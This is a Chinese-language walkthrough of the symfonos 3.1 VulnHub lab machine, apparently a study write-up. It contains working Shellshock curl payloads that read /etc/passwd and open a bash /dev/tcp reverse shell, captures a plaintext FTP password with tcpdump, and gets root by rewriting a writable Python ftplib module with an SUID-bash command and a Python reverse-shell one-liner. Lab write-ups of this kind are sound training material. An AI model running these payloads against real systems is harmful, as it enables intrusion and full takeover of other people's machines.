【攻略鸭】symfonos 3.1_VulnHub靶机攻略

2023-02-09 16:41 作者:攻略鸭 0人读过 | 我要投稿

本文内容纯属虚构，攻略鸭求b站关注点赞支持！

靶机IP地址：192.168.31.37

测试机IP地址：192.168.31.38

外部信息收集

访问http://192.168.31.37/

页面源代码中有注释：

端口扫描

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.5b
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))

网站目录枚举

$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/FUZZ
http://192.168.31.37/gate/
访问后发现还只是个图片
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/gate/FUZZ
http://192.168.31.37/gate/cerberus/
访问后发现还只是个图片
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/gate/cerberus/FUZZ
没结果

换个字典
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://192.168.31.37/FUZZ
.hta [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 3ms]
cgi-bin/ [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 1ms]
.htpasswd [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 87ms]
gate [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 0ms]
index.html [Status: 200, Size: 241, Words: 24, Lines: 23, Duration: 1ms]
.htaccess [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 174ms]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 0ms]

/cgi-bin/表明机器上可能有CGI应用程序。

$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://192.168.31.37/cgi-bin/FUZZ
没结果
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/cgi-bin/FUZZ
underworld [Status: 200, Size: 62, Words: 14, Lines: 2, Duration: 149ms]

访问http://192.168.31.37/cgi-bin/underworld
返回 21:20:03 up 1:55, 0 users, load average: 0.22, 1.08, 0.72

搜索引擎搜返回内容，是执行uptime命令的结果。

Shellshock漏洞

curl -H "Connection: () { : ;};echo;echo;/bin/bash -c 'cat /etc/passwd'" http://192.168.31.37/cgi-bin/underworld
root:x:0:0:root:/root:/bin/bash
...
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
hades:x:1000:1000:,,,:/home/hades:/bin/bash
cerberus:x:1001:1001:,,,:/home/cerberus:/bin/bash
proftpd:x:108:65534::/run/proftpd:/bin/false
ftp:x:109:65534::/srv/ftp:/bin/false

Bash Socket反向shell

nc -nvlp 443
curl -H "Connection: () { : ;};echo;echo;/bin/bash -i &>/dev/tcp/192.168.31.38/443 <&1" http://192.168.31.37/cgi-bin/underworld
cerberus@symfonos3:/usr/lib/cgi-bin$ id
uid=1001(cerberus) gid=1001(cerberus) groups=1001(cerberus),33(www-data),1003(pcap)
python -c 'import pty;pty.spawn("/bin/bash")'
$ searchsploit -m 36742.txt
失败

权限提升

pspy观察系统进程

用pspy观察系统进程看有没有暂时看不到的定时任务/usr/sbin
cerberus@symfonos3:/tmp$ wget "http://192.168.31.38:8000/pspy64s"
cerberus@symfonos3:/tmp$ chmod +x pspy64s
cerberus@symfonos3:/tmp$ ./pspy64
2023/02/07 01:55:40 CMD: UID=1000 PID=476 | proftpd: (accepting connections)
2023/02/07 01:56:01 CMD: UID=0 PID=20391 | /bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py
2023/02/07 01:56:01 CMD: UID=0 PID=20390 | /bin/sh -c /usr/bin/curl --silent -I 127.0.0.1 > /opt/ftpclient/statuscheck.txt
2023/02/07 01:56:01 CMD: UID=1000 PID=20392 | proftpd: (accepting connections)
2023/02/07 01:56:01 CMD: UID=0 PID=20393 | /usr/sbin/CRON -f
2023/02/07 01:56:01 CMD: UID=105 PID=20394 | /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root
2023/02/07 01:56:01 CMD: UID=1000 PID=20395 | /usr/sbin/exim4 -Mc 1pPIpd-0005Iv-CG

1.利用FTP明文传输抓取口令

cerberus@symfonos3:/usr/sbin$ ip add
1: lo: inet 127.0.0.1/8 scope host lo
2: ens33: inet 192.168.31.37/24 brd 192.168.31.255 scope global ens33

cerberus@symfonos3:/usr/lib/cgi-bin$ id
uid=1001(cerberus) gid=1001(cerberus) groups=1001(cerberus),33(www-data),1003(pcap)
属于pcap组

tcpdump -i lo port 21
tcpdump: lo: You don't have permission to capture on that device
(socket: Operation not permitted)
遇到权限问题，把靶机删掉重新创建。
tcpdump -i lo port 21
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
02:20:01.478756 IP localhost.59512 > localhost.ftp: Flags [P.], seq 1:13, ack 56, win 342, options [nop,nop,TS val 4294944980 ecr 4294944980], length 12: FTP: USER hades
02:20:01.478758 IP localhost.ftp > localhost.59512: Flags [.], ack 13, win 342, options [nop,nop,TS val 4294944980 ecr 4294944980], length 0
02:20:01.479803 IP localhost.ftp > localhost.59512: Flags [P.], seq 56:89, ack 13, win 342, options [nop,nop,TS val 4294944981 ecr 4294944980], length 33: FTP: 331 Password required for hades
02:20:01.479846 IP localhost.59512 > localhost.ftp: Flags [P.], seq 13:36, ack 89, win 342, options [nop,nop,TS val 4294944981 ecr 4294944981], length 23: FTP: PASS PTpZTfU4vxgzvRBE
02:20:01.489005 IP localhost.ftp > localhost.59512: Flags [P.], seq 89:115, ack 36, win 342, options [nop,nop,TS val 4294944983 ecr 4294944981], length 26: FTP: 230 User hades logged in
02:20:01.489102 IP localhost.59512 > localhost.ftp: Flags [P.], seq 36:51, ack 115, win 342, options [nop,nop,TS val 4294944983 ecr 4294944983], length 15: FTP: CWD /srv/ftp/
02:20:01.489378 IP localhost.ftp > localhost.59512: Flags [P.], seq 115:143, ack 51, win 342, options [nop,nop,TS val 4294944983 ecr 4294944983], length 28: FTP: 250 CWD command successful

USER hades

PASS PTpZTfU4vxgzvRBE

利用该用户名口令去测试SSH服务

ssh hades@192.168.31.37
hades@symfonos3:/tmp$ id
uid=1000(hades) gid=1000(hades) groups=1000(hades),1002(gods)

2.定期执行的ftpclient.py

观察系统进程时看到系统定期执行：/bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py

$ cat /opt/ftpclient/ftpclient.py
cat: /opt/ftpclient/ftpclient.py: Permission denied

$ ls -al /opt/ftpclient
-rw-r--r-- 1 root hades 262 Apr 6 2020 ftpclient.py
-rw-r--r-- 1 root hades 251 Feb 7 02:55 statuscheck.txt

hades@symfonos3:/opt/ftpclient$ cat ftpclient.py
import ftplib

ftp = ftplib.FTP('127.0.0.1')
ftp.login(user='hades', passwd='PTpZTfU4vxgzvRBE')

ftp.cwd('/srv/ftp/')

def upload():
filename = '/opt/client/statuscheck.txt'
ftp.storbinary('STOR '+filename, open(filename, 'rb'))
ftp.quit()

upload()

修改python模块提权

$ find / -name ftplib* 2>/dev/null
/usr/lib/python2.7/ftplib.pyc
/usr/lib/python2.7/ftplib.py
/usr/lib/python3.5/__pycache__/ftplib.cpython-35.pyc
/usr/lib/python3.5/ftplib.py

$ ls -l /usr/lib/python2.7/ftplib.py
-rwxrw-r-- 1 root gods 37755 Sep 26 2018 /usr/lib/python2.7/ftplib.py

有修改该python模块的权限。

1.创建新ftplib.py去复制/bin/bash并覆盖原有的ftplib.py

备份ftplib.py
cp /usr/lib/python2.7/ftplib.py /tmp/ftplib.py.bak

创建一个新的ftplib.py
nano /tmp/ftplib.py
import os;os.system("cp /bin/bash /tmp/rootbash;chmod u+s /tmp/rootbash")

覆盖原有的ftplib.py
cp /tmp/ftplib.py /usr/lib/python2.7/ftplib.py

等一会儿将获得bash
ls -l /tmp/rootbash
/tmp/rootbash

2.ftplib.py中添加python反向shell

$ vi /usr/lib/python2.7/ftplib.py
添加：
import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.38",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
开启测试机监听端口：
$ nc -nvlp 9000
# id
uid=0(root) gid=0(root) groups=0(root)